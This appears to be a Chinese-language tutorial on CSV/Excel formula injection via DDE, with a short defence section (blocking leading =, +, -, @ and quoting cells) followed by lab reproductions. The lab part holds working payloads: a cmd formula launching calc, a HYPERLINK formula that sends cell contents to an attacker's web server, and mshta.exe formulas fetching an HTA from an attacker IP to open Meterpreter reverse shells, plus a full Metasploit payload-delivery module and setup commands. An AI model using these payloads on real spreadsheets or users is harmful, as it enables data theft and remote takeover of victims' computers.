漏洞简介:
CSV注入(CSV Injection)漏洞通常会出现在有导出文件(.csv/.xls)功能的网站中。当导出的文件内容可控时,攻击者通常将恶意负载(公式)注入到输入字段中,用户导出文件打开后,EXCEL会调用本身的动态功能,执行攻击者的恶意代码,从而控制用户计算机。
漏洞原理:
在xls表格中,输入=1+1,回车后看到表格变成2,+号被当作运算执行了
不只是+号, = 、- 、@这三个符号也会被excel解析成共事
DDE(Dynamic Data Exchange)协议:
DDE是Windows下进程间通信协议,是一种动态数据交换机制,使用DDE通讯需要两个Windows应用程序,其中一个作为服务器处理信息,另外一个作为客户机从服务器获得信息。DDE支持Microsoft Excel,LibreOffice和Apache OpenOffice。 Excel、Word、Rtf、Outlook都 可以使用这种机制,根据外部应用的处理结果来更新内容。因此,如果我们制作包含DDE公式的CSV文件,那么在打开该文件时,Excel就会尝试执行外部应用
- 较老的版本如office 2016 MSO(16.0.4266.1001)默认使用该协议
- 新版本需要手动开启配置:文件->选项->信任中心->信任中心设置->外部内容->启用动态数据交换服务器启动
防御方法:
这种攻击很难缓解,并且从许多漏洞赏金计划中都明确禁止了这种攻击。
1、 禁止特殊符号
请确保没有任何单元格以下列任何字符开头:
等于(“ =”)
加号(“ +”)
减号(“-”)
在 (”@”)
2、 点引号保护
单元格的开头添加单引号’,表示excel中该单元格不包含公式,并且在查看MS Excel时,在单元格中作为第一个字符输入时不会显示
实验
1.本地复现
在单元格输入:=1*cmd|’ /C calc’!‘A1’ //cmd /c执行cmd命令后关闭窗口
出现安全提示的弹窗,点击是,就会弹出计算器
2.恶意网站(钓鱼)
在单元格输入:=HYPERLINK(“http://baidu.com”,“点我去百度”) // hyperlink,超链接函数
用户点击文字,会自动打开默认浏览器访问百度页面,无警告
可以配合IE浏览器漏洞、Flash等漏洞获取shell
CVE-2018-8174
CVE-2018-4878
3.窃取单元格信息
开启kali的web服务:service apache2 start
web日志:/var/log/apache2/access.log
单元格输入:=HYPERLINK(“http://192.168.200.140//”&D2&D3,“Error: Please click me!”)
用户点击访问后,把D2、D3内容以访问文件形式发送给攻击者,攻击者查看web日志可获取信息
CVE-2018-10504
CVE-2019-15092
3.反弹shell-1
kali(攻击机):192.168.200.140
靶机(win10):192.168.200.150
使用模块:exploit/windows/fileformat/office_word_hta
payload/windows/meterpreter/reverse_http
加载模块office_word_hta
设置payload
use payload/windows/meterpreter/reverse_http
set lhost 192.168.200.140 #kali的IP
set ExitSession false
exploit
靶机win10新建表格,内容插入+1+cmd|‘/c mshta.exe http://192.168.200.140:8080/default.hta’!A0
表格弹出提示框,点击确认后,win10上线
4.反弹shell-2
kali(攻击机):192.168.200.140
靶机(win10):192.168.200.150
代码出处
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Office Payload Delivery',
'Description' => %q{
This module generates an command to place within
a word document, that when executed, will retrieve a HTA payload
via HTTP from an web server. Currently have not figured out how
to generate a doc.
},
'License' => MSF_LICENSE,
'Arch' => ARCH_X86,
'Platform' => 'win',
'Targets' =>
[
['Automatic', {} ],
],
'DefaultTarget' => 0,
))
end
def on_request_uri(cli, _request)
print_status("Delivering payload")
p = regenerate_payload(cli)
data = Msf::Util::EXE.to_executable_fmt(
framework,
ARCH_X86,
'win',
p.encoded,
'hta-psh',
{ :arch => ARCH_X86, :platform => 'win '}
)
send_response(cli, data, 'Content-Type' => 'application/hta')
end
def primer
url = get_uri
print_status("Place the following DDE in an MS document:")
print_line("mshta.exe \"#{url}\"")
end
end
将ruby文件放置到kali的msf目录:/usr/share/metasploit-framework/modules/exploits/windows/smb/msh_shell.rb
启动数据库:service postgresql start
启动msf:msfconsole
重置数据库:reload_all
查询新建msh_shell模块:search msh_shell
加载 msh_shell模块:use exploit/windows/smb/msh_shell 或者 use 0
设置监听payload:
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.206.128(kali的IP)
set uripath csv
exploit
win10新建excel,单元格插入+1+cmd|‘/c mshta.exe http://192.168.200.140:8080/csv’!A0
点击确定后(杀软会提示,再次点击允许),win10就上线了
连接shell,输入dir可看到当前目录及文件
输入shell,进入cmd命令